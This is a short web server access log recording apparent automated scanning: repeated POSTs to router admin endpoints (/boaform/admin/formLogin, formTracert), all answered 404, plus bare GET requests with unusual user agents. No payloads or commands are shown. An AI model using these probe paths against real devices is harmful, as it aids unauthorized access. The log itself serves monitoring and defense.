161.248.238.13 - - [07/May/2025:04:12:41 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:04:12:43 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:04:12:55 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:04:13:35 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [07/May/2025:04:14:50 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [07/May/2025:04:14:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.142.182 - - [07/May/2025:04:14:50 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:04:14:54 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:04:15:16 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:04:15:20 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:04:16:07 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
